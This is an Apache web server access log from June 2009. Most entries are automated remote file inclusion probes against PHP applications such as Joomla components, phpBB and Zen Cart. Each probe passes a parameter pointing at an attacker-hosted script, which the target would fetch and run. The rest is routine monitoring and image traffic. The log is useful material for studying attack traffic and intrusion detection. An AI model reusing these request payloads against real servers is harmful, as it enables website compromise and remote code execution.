124.217.216.86 - - [10/Jun/2009:06:33:28 -0400] "GET /?sourcedir=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.826"
124.217.216.86 - - [10/Jun/2009:06:33:28 -0400] "GET /logs/?sourcedir=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 200 4902 "-" "libwww-perl/5.826"
124.217.216.86 - - [10/Jun/2009:06:33:38 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.826"
219.85.63.226 - - [10/Jun/2009:06:33:42 -0400] "GET /logs/error_log.Q109041400/http://kamama.thin-media.ca/cyzwy/vop.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
77.246.179.52 - - [10/Jun/2009:06:33:45 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ukcouncilexchanges.info/FX29ID1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
124.217.216.86 - - [10/Jun/2009:06:34:34 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
124.217.216.86 - - [10/Jun/2009:06:34:34 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.826"
124.217.216.86 - - [10/Jun/2009:06:34:34 -0400] "GET /logs/access_log.Q109052900//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.826"
89.223.3.98 - - [10/Jun/2009:06:35:02 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:06:35:02 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:06:35:02 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
124.217.216.86 - - [10/Jun/2009:06:35:04 -0400] "GET /logs/access_log.Q109050900//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.826"
116.125.126.72 - - [10/Jun/2009:06:35:12 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
116.125.126.72 - - [10/Jun/2009:06:35:12 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
116.125.126.72 - - [10/Jun/2009:06:35:13 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
116.125.126.72 - - [10/Jun/2009:06:35:19 -0400] "GET /logs/access_log.Q109051700/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:06:35:27 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:06:35:27 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:06:35:27 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:06:35:31 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:06:35:31 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:06:35:31 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
172.16.1.180 - - [10/Jun/2009:06:35:49 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:06:35:49 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:06:35:49 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
89.223.3.98 - - [10/Jun/2009:06:36:06 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
129.125.28.89 - - [10/Jun/2009:06:36:29 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
129.125.28.89 - - [10/Jun/2009:06:36:29 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
129.125.28.89 - - [10/Jun/2009:06:36:30 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
129.125.28.89 - - [10/Jun/2009:06:36:30 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
218.249.36.194 - - [10/Jun/2009:06:36:50 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:06:36:50 -0400] "GET /logs/?sourcedir=http://aboutav.com//id1.txt??? HTTP/1.1" 200 4902 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:06:36:50 -0400] "GET /?sourcedir=http://aboutav.com//id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:06:37:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.85.165.10 - - [10/Jun/2009:06:37:33 -0400] "GET /logs/access_log.Q109051600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:06:37:36 -0400] "GET /?sourcedir=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:06:37:41 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:06:37:41 -0400] "GET /logs/?sourcedir=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 200 4902 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:06:37:54 -0400] "GET /logs/access_log.Q109052800%20%20/?sourcedir=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:06:37:57 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
60.251.217.4 - - [10/Jun/2009:06:37:59 -0400] "GET /logs/access_log.Q109051700/?view=page&pagename=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
193.25.197.81 - - [10/Jun/2009:06:38:38 -0400] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.pdtmg.org.br/includes/js/calendar/list.txt?? HTTP/1.1" 404 242 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
193.25.197.81 - - [10/Jun/2009:06:38:39 -0400] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.pdtmg.org.br/includes/js/calendar/list.txt?? HTTP/1.1" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
66.226.153.1 - - [10/Jun/2009:06:38:58 -0400] "GET /logs//components/com_sef/sef.php?mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
66.226.153.1 - - [10/Jun/2009:06:38:58 -0400] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
66.226.153.1 - - [10/Jun/2009:06:38:58 -0400] "GET /logs/access_log.Q109052900//components/com_sef/sef.php?mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
174.143.3.188 - - [10/Jun/2009:06:39:10 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.sanri.org/HCboard/data/idomila.txt? HTTP/1.1" 404 249 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
174.143.3.188 - - [10/Jun/2009:06:39:10 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.sanri.org/HCboard/data/idomila.txt? HTTP/1.1" 404 222 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.16.16.225 - - [10/Jun/2009:06:39:21 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.sanri.org/HCboard/data/idomila.txt? HTTP/1.1" 404 249 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.16.16.225 - - [10/Jun/2009:06:39:22 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.sanri.org/HCboard/data/idomila.txt? HTTP/1.1" 404 222 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
174.143.3.188 - - [10/Jun/2009:06:39:31 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.sanri.org/HCboard/data/idomila.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
174.143.3.188 - - [10/Jun/2009:06:39:31 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.sanri.org/HCboard/data/idomila.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
174.143.3.188 - - [10/Jun/2009:06:39:31 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.sanri.org/HCboard/data/idomila.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
218.249.36.194 - - [10/Jun/2009:06:39:36 -0400] "GET /logs/access_log.Q109052800%20%20/?sourcedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.217.216.86 - - [10/Jun/2009:06:39:45 -0400] "GET /logs/error_log.Q109050800%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.826"
217.16.16.225 - - [10/Jun/2009:06:39:50 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.sanri.org/HCboard/data/idomila.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
217.16.16.225 - - [10/Jun/2009:06:39:50 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.sanri.org/HCboard/data/idomila.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
217.16.16.225 - - [10/Jun/2009:06:39:51 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.sanri.org/HCboard/data/idomila.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
211.234.107.233 - - [10/Jun/2009:06:39:52 -0400] "GET /?sourcedir=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.234.107.233 - - [10/Jun/2009:06:39:52 -0400] "GET /logs/?sourcedir=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 200 4902 "-" "Mozilla/5.0"
211.234.107.233 - - [10/Jun/2009:06:39:56 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
116.125.126.72 - - [10/Jun/2009:06:40:17 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
174.143.3.188 - - [10/Jun/2009:06:41:07 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.sanri.org/HCboard/data/idomila.txt? HTTP/1.1" 404 248 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.226.153.1 - - [10/Jun/2009:06:41:13 -0400] "GET /logs/access_log.Q109052900%20%20//components/com_sef/sef.php?mosConfig_absolute_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
174.143.3.188 - - [10/Jun/2009:06:41:37 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.sanri.org/HCboard/data/idomila.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
116.125.126.72 - - [10/Jun/2009:06:41:52 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
116.125.126.72 - - [10/Jun/2009:06:41:55 -0400] "GET /logs/access_log.Q109051700%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:06:42:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.16.16.225 - - [10/Jun/2009:06:42:39 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.sanri.org/HCboard/data/idomila.txt? HTTP/1.1" 404 248 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
60.251.217.4 - - [10/Jun/2009:06:42:52 -0400] "GET /logs/access_log.Q109051700/?view=page&pagename=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
174.143.3.188 - - [10/Jun/2009:06:43:10 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.sanri.org/HCboard/data/idomila.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
217.16.16.225 - - [10/Jun/2009:06:43:17 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.sanri.org/HCboard/data/idomila.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
12.184.171.65 - - [10/Jun/2009:06:43:19 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.livepurehealth.ca/store/partner/..-/test.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
12.184.171.65 - - [10/Jun/2009:06:43:19 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.livepurehealth.ca/store/partner/..-/test.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
216.14.117.22 - - [10/Jun/2009:06:43:47 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 225 "-" "libwww-perl/5.820"
216.14.117.22 - - [10/Jun/2009:06:43:47 -0400] "GET /?sourcedir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 200 409 "-" "libwww-perl/5.820"
216.14.117.22 - - [10/Jun/2009:06:43:47 -0400] "GET /logs/?sourcedir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 200 4902 "-" "libwww-perl/5.820"
88.172.54.201 - - [10/Jun/2009:06:43:59 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
88.172.54.201 - - [10/Jun/2009:06:43:59 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
88.172.54.201 - - [10/Jun/2009:06:44:01 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
88.172.54.201 - - [10/Jun/2009:06:44:01 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
217.16.16.225 - - [10/Jun/2009:06:44:08 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.sanri.org/HCboard/data/idomila.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
172.16.1.180 - - [10/Jun/2009:06:44:34 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:06:44:34 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:06:44:34 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
216.14.117.22 - - [10/Jun/2009:06:46:17 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 225 "-" "libwww-perl/5.820"
124.217.216.86 - - [10/Jun/2009:06:46:46 -0400] "GET /logs/error_log.Q108052600%20/?sourcedir=http://www.foxreality.com/editor/idus.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.826"
216.14.117.22 - - [10/Jun/2009:06:47:08 -0400] "GET /?sourcedir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 200 409 "-" "libwww-perl/5.820"
209.59.12.99 - - [10/Jun/2009:06:47:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.74.64.27 - - [10/Jun/2009:06:49:15 -0400] "GET /?sourcedir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
172.16.1.180 - - [10/Jun/2009:06:50:38 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:06:50:38 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:06:50:39 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [10/Jun/2009:06:52:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.152.82 - - [10/Jun/2009:06:53:04 -0400] "GET /?sourcedir=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
77.221.152.82 - - [10/Jun/2009:06:53:04 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
77.221.152.82 - - [10/Jun/2009:06:53:04 -0400] "GET /logs/?sourcedir=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 200 4902 "-" "libwww-perl/5.805"
77.221.152.82 - - [10/Jun/2009:06:53:11 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
77.221.152.82 - - [10/Jun/2009:06:53:24 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
77.221.152.82 - - [10/Jun/2009:06:53:24 -0400] "GET /logs/error_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
77.221.152.82 - - [10/Jun/2009:06:53:25 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
77.221.152.82 - - [10/Jun/2009:06:53:30 -0400] "GET /logs//?path%5Bdocroot%5D=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 200 4907 "-" "libwww-perl/5.805"
77.221.152.82 - - [10/Jun/2009:06:53:30 -0400] "GET /logs/access_log.Q109051800//?path%5Bdocroot%5D=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
77.221.152.82 - - [10/Jun/2009:06:53:30 -0400] "GET //?path%5Bdocroot%5D=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
77.221.152.82 - - [10/Jun/2009:06:53:34 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
211.234.107.233 - - [10/Jun/2009:06:54:34 -0400] "GET /?sourcedir=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.234.107.233 - - [10/Jun/2009:06:54:34 -0400] "GET /logs/?sourcedir=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 200 4902 "-" "Mozilla/5.0"
211.234.107.233 - - [10/Jun/2009:06:54:34 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.234.107.233 - - [10/Jun/2009:06:54:59 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
172.16.1.180 - - [10/Jun/2009:06:55:41 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:06:55:41 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:06:55:41 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
77.221.152.82 - - [10/Jun/2009:06:55:55 -0400] "GET /logs/error_log.Q108052600%20/?sourcedir=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
209.59.12.99 - - [10/Jun/2009:06:57:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
12.184.171.65 - - [10/Jun/2009:06:59:12 -0400] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.livepurehealth.ca/store/partner/..-/test.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
12.184.171.65 - - [10/Jun/2009:06:59:12 -0400] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.livepurehealth.ca/store/partner/..-/test.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
211.234.107.233 - - [10/Jun/2009:07:00:14 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
216.14.117.22 - - [10/Jun/2009:07:00:38 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 246 "-" "libwww-perl/5.820"
216.14.117.22 - - [10/Jun/2009:07:00:38 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 219 "-" "libwww-perl/5.820"
216.14.117.22 - - [10/Jun/2009:07:00:38 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 224 "-" "libwww-perl/5.820"
216.14.117.22 - - [10/Jun/2009:07:00:40 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 246 "-" "libwww-perl/5.820"
80.74.64.27 - - [10/Jun/2009:07:00:45 -0400] "GET /?sourcedir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
72.36.134.234 - - [10/Jun/2009:07:00:48 -0400] "GET /arcade.php?phpbb_root_path=http://www.aptd.ru/files/idtester.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
72.36.134.234 - - [10/Jun/2009:07:00:48 -0400] "GET /logs/arcade.php?phpbb_root_path=http://www.aptd.ru/files/idtester.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
72.36.134.234 - - [10/Jun/2009:07:00:48 -0400] "GET /logs/error_log.Q109051200/arcade.php?phpbb_root_path=http://www.aptd.ru/files/idtester.txt%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
172.16.1.180 - - [10/Jun/2009:07:00:55 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:00:55 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:00:55 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:02:02 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:02:02 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:02:02 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [10/Jun/2009:07:02:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
